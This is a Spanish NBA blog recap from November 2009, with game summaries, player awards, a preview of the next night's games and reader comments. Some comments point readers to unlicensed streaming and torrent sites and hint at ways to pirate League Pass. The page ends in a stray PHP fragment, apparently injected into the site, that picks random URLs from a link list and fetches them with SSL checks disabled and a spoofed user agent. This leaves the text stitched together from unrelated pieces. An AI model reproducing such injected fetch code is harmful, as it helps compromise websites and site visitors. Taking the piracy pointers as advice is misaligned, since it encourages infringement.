La Crónica (11/11/2009)

12 de November de 2009 por MagicJohnson32

Esperábamos bastante de la tremebunda jornada de anoche, con duelos por todo lo alto y, como se suele decir, emoción garantizada. Ni mucho menos. Hubo muy poca igualdad en apenas algún partido, los choques se resolvieron por amplias diferencias y, si la emoción estaba garantizada, que nos devuelvan el dinero.

El plato fuerte de la noche, con morbo incluído, era el Cleveland @ Orlando. Los Cavs justificaban el fichaje de Shaq anulando al (super)hombre que les aniquiló en las pasadas finales de conferencia. Después hicieron valer su superioridad en el duelo LeBron&Mo Vs Vince&Nelson. Resultado: victoria excesivamente cómoda que no nos ofrece apenas conclusiones reales atendiendo a algunas ausencias importantes.

Tampoco encontramos emociones fuertes en la paliza que les dieron los Celtics a los Jazz, ni en la que les dieron los Suns a los Hornets. Algo más igualadas fueron las victorias de los Spurs sobre los Mavs, sin Duncan ni Parker pero con un Jefferson demoledor, y también la de los Raptors sobre los Bulls, con el mejor Calderon de la temporada y Bosh resolviendo.

El único de los favoritos que tropezó fueron los Nuggets en Milwaukee, pagando el descontrol en el tiro que no habíamos visto en ellos desde hace mucho tiempo y la expectacular actuación de la tríada Jennings-Bogut-Ilyasova. Extraordinario partido de los Bucks.

En los duelos a priori más desequilibrados no hubo lugar a la sorpresa. Acaso estuvieron a punto los Nets de romper su mala racha contra los Sixers, pero Speights y Young salvaron de la vergüenza a Iguodala y Brand, deprimentes. Sobrados ganaron los Pistons a los Bobcats, que siguen liderados por Mohammed con 13 puntos (os podéis imaginar cómo lo hace el resto en ataque). Los Hawks no tuvieron que sudar demasiado contra los Knicks; los Blazers apalizaron a los Wolves, con Webster y Rudy haciendo un trabajo excelente desde el banco así como los Rockets hicieron lo propio contra los Grizzlies, en un flojo partido de Marc.

Por último, los Pacers ganaron a los Warriors de forma bastante cómoda y los Thunder recuperaron la senda ganadora a cambio de devolver a los Clippers a la perdedora.

PREMIOS

MVP: Obviemos a Lebron James y centrémonos en Brandon Jennings. El rookie de Milwaukee comandó a su equipo a la victoria con 32 puntos y 9 asistencias frente a los apriori todopoderosos Nuggets y ni siquiera el retorno de Michael Redd hace pensar que pueda perder los galones que se está ganando día a día. Danny Granger, con 31 puntos y 16 rebotes, es el tercero en discordia.

Rookie: Evidentemente el mejor rookie del día es Brandon Jennings pero como ya le hemos dado su parte de coba tenemos que fijarnos en Taj Gibson y Toney Douglas, 2 rookies que también podrían aparecer en el apartado de sorpresas. En Chicago no echan de menos a Tyrus Thomas y en New York, Duhon empieza a despedirse de la titularidad.

Sorpresa: Volvió Charlie Villanueva (30 puntos), Kyle Lowry casi se marca un triple doble saliendo desde el banquillo (8 puntos, 10 asistencias y 8 rebotes), Rudy Fernández aprovechó a la perfección los minutos que le dio McMillan (15 puntos, 5 rebotes y 4 asistencias), Ersan Ilyasova fue clave en la victoria de los Bucks (17 puntos y 8 rebotes) y finalmente, Earl Watson cuajó un gran partido ante la lesión de TJ Ford. Fue como un día de reencuentros.

Decepción: Tenemos para repartir. Primero una ración de jugadores interiores. Más valía que Carlos Boozer, Elton Brand y Dwight Howard se hubieran quedado en casa porque su actuación de ayer estuvo muy por debajo de su nivel habitual (sangrante el de Philadelphia). Y por fuera, mala actuación de Anthony Morrow en su primer partido como titular, aunque es cierto que Monta Ellis no estaba por la labor de pasarle mucho el balón.

Esfuerzo en vano: Ni Vince Carter, ni Dirk Nowitzki, ni Carmelo Anthony pudieron hacer nada para llevarse la victoria a casa a pesar de sus actuaciones pero al menos ellos ganan de vez en cuando. Brook Lopez y Baron Davis sí que no aspiran a mucho más que a aparecer en este apartado de vez en cuando (al menos hasta que vuelva B. Griffin).

RAZONES PARA TRASNOCHAR

Hoy es “uno de esos jueves”. De ésos en los que vale la pena pasar la noche en vela y verse 5 horas seguidas de NBA. Porque a las 2h00 se enfrentan LeBron y Wade, y resulta, quién lo iba a decir, que los Heat llegan con un balance de 6-1 mientras que los Cavs suman ya tres derrotas. Y a continuación, a las 4h30, los dos mejores equipos del Oeste reviven un clásico moderno de la conferencia: los Suns del mejor Nash desde su doble MVP contra unos Lakers que recuperan a Bynum tras su lesión.

Comenta

15 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Brandon ‘Smash’ Jennings……jugón!!!!!

      Citar

  2. TheDeerHunter dice:
    #2

    Os habéis olvidado de mencionar a Stojakovic. Menuda pestiña de partido se ha marcado el colega… 0-8. Casi lloro esta mañana cuando lo he visto.

    Phil ha dicho que, a todo lo más, Gasol volverá para Navidades. Por lo visto está hasta la huevada de no contar con él (y yo también que lo tengo en una de mis fantasy leagues) y lo mejor que le sale al respecto son ironías. A mí casi me da algo cuando he leído el titular esta mañana.

      Citar

  3. pcerezo dice:
    #3

    Rick Adelman, Rick Adelman, Rick Adelman…..Jugón!!!!!!! Viva el club del abuelo Vito….Qué haría este tío con los Cavs, Orlando….

    Un saludo,
    Pablo

      Citar

  4. Viva_Dirk dice:
    #4

    Ese tio ya tuvo a los Kings a su disposición e hizo lo que hizo, yo no digo que sea mucho ni poco pero lo que viene siendo un título ni olerlo, ni ganó la conferencia.

    Ojo que me parece un grandísimo entrenador, pero no creo que hiciese mas que llegar a la final de la NBA con Cavs o Magics, que es algo que ya han hecho los 2 que están en el cargo.

      Citar

  5. TheDeerHunter dice:
    #5

    Pues yo jamás le he visto a Adelman hacer la que hizo Van Gundy el año pasado en las finales con el tema de los bases, por ejemplo.

    Le tengo infinita mejor consideración a Adelman que a Van Gundy y Mike Brown juntos.
    Es una mera opinión, basada únicamente en sensaciones, que sé lo bordes que os ponéis alguno con las elucubraciones.

    Adelman es de los que dan valor añadido a lo que tienen, esa rara avis que sí les he llegado a ver decisiones que han logrado cambiar el guión… al contrario que otros que yo me sé y no quiero ni mentar aquí. Entre medio hay un gran núcleo de entrenadores que se limitan a cumplir.

    Sin contar a tito Phil que está por encima del bien y del mal, los técnicos que más admiro son (sin orden establecido) Adelman, Rivers y Sloan. Para mí son los que más aportan hoy por hoy, aunque hay algunos otros que me gustan.
    Poppovic es un grande, pero detesto sus métodos.

    El que menos ya sabéis quien es… aunque hay otros que ni fú ni fá, que no sé si es peor…

      Citar

  6. PIRATA dice:
    #6

    Buenas a todos, supongo que lo que voy a preguntar ya os lo han preguntado muchas veces, por que plataforma o parabólica o lo que sea se pueden seguir todos los partidos en directo?

    Sigo cada dia vuestro blog, es genial.

    Gràcias.

      Citar

  7. sergio dice:
    #7

    Parece que son grandes tiempos de bases y no demasiado buenos de pivots (Marc, Brooks o Kevin Love aparte, el resto para defender [te echo de menos Hakeem]). Que Dampier te haga los numeros del otro dia es para mirarselo. Que Mohammed sea el maximo anotador de su equipo, tambien. Parece que ahora estan de moda los falsos “centers” dedicados a tirar desde lejos tipo Matt Bonner, Okur, Bargnani o Frye. Aunque tener al lado a bestias del calibre de Bosh, Amare, Duncan y Boozer ayude un tanto….

    Tengo ganas de ver el Suns-Lakers de esta noche. Los Suns son el primer equipo que mete 100 triples en menos de 10 partidos y encima con un 47.4%. El otro dia hablabais de Deron y Boozer parecidos a Malone y Stockton pero echadle un ojo a los Pick & Roll de Amare y Nash. Fisher siempre los ha defendido bien, espero que no se le olvide hoy. Jum…Bryant se ira por encima de los 40 con seguridad.

    Lanzo una pregunta ahora que es un tanto ventajista jaja ¿Puede llevarse Nash el MVP de la Regular? Si asi fuera igualaria al gran Magic, por cierto.

      Citar

  8. pcerezo dice:
    #8

    Sergio….jugón!!! Deja respuestas para los demás…jjj es broma…

    Ese Brandon Jennings tiene un pinta fantástica…al final no va a ser tan fanfarrón…
    Suns-Phoenix partidazo. Yo no daba un duro por estos Suns, pero es que “Notredam” está a un nivel que no es normal. El MVP va a ser difícil porque Bryant está tremendo, pero chico quinteto titular sin duda.

    Por cierto habéis visto al periodista de Chicago comerse un artículo de lo que dijo sobre Noah? Qué sentido del espectáculo tienen, esto en España es impensable. Os dejo el enlace de Marca:

    http://www.marca.com/2009/11/12/baloncesto/nba/1258030058.html?a=CEP17b82033b2baa79e0c3531446d2efd7c&t=1258040688

    Un saludo,
    Pablo

      Citar

  9. Love Denise dice:
    #9

    si alguien ha podido ver el mag-cavs, qué me diga, ¿por qué solo ha tirado 3 veces Howard en 31 minutos? shaq solo ha jugado 19 minutos (supongo que por problemas de faltas), ¿tan buena ha sido la defensa de Hickson y Varejao? de todas formas, sigo viendo superior a los magic respecto a los cavs, en un dia inspiradisimo de james y williams, y haciendo un 71% en triples, solo nos han ganado de 9 con un nefasto partido de los magic (22% en triples, solo 8 asist, etc..) y sin Anderson y Lewis.

    Respecto a los españoles, muy bien Calde, mal Gasol en consonancia con su equip…banda, y Rudy que solo tendrá dias buenos como hoy cuando le entren los triples, parece que es su unica función allí.

    Respecto quién os parece el mejor entrenador, ya di mi opinion sobre ello en la cronica del 6/11 , eran en lo táctico, Adelman, sloan y Stan VGundy, y en lo psicológico-motivación, controlar egos, Phil Jackson.

    @viva dirk: Buen partido de Oden (lo reconozco, je je )

      Citar

  10. PIRATA dice:
    #10

    Sensación de ser invisible.

    Buenas a todos, supongo que lo que voy a preguntar ya os lo han preguntado muchas veces, por que plataforma o parabólica o lo que sea se pueden seguir todos los partidos en directo?

    Sigo cada dia vuestro blog, es genial.

    Gràcias.

      Citar

  11. TheDeerHunter dice:
    #11

    internet, amigo pirata… por tu nick parece mentira que no lo sepas
    está también el pass league… pregunta a kantonyo

      Citar

  12. Txusma dice:
    #12

    En Rojadirecta suele haber enlaces…

      Citar

  13. sergio dice:
    #13

    @PIRATA: El League Pass de la pagina oficial de la NBA es pagando pero creo que existen formas de piratearlo… busca en San Google. Eso si, si te pillan te puedes exponer a cosas tan bonitas como denuncias de fraude etcetera. La verdad es que no cuesta tanto… tu mismo.

    En cuanto a paginas… busca en Rojadirecta.com o ve directamente a ustream.tv o justin.tv y buscalo ahi. Es mejor que te registres para tener preferencia a la hora de verlos.

      Citar

  14. PIRATA dice:
    #14

    Gracias por la información, de hecho es como intentaba mirar-lo però al ver vuestros comentarios pensaba que habia algun sistema menos cutre. La putada es que vivo en un sitio donde no existe la palabra mega y veo todos los partidos en camara lenta.
    Saludos.

      Citar

  15. kantonyo dice:
    #15

    Si tienes la conexión lenta y quieres verlos en mejor calidad, tambien tienes la opción de descargartelos en rojadirecta o en http://bt.davka.info/ y luego verlos tranquilamente, hay que tener más paciencia, pero te puedes evadir sin ver el resultado y disfrutarlo como si lo vieras en directo. Es un lujo ver un partido de la NBA en calidad hdtv en un televisor de 40″ … XD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>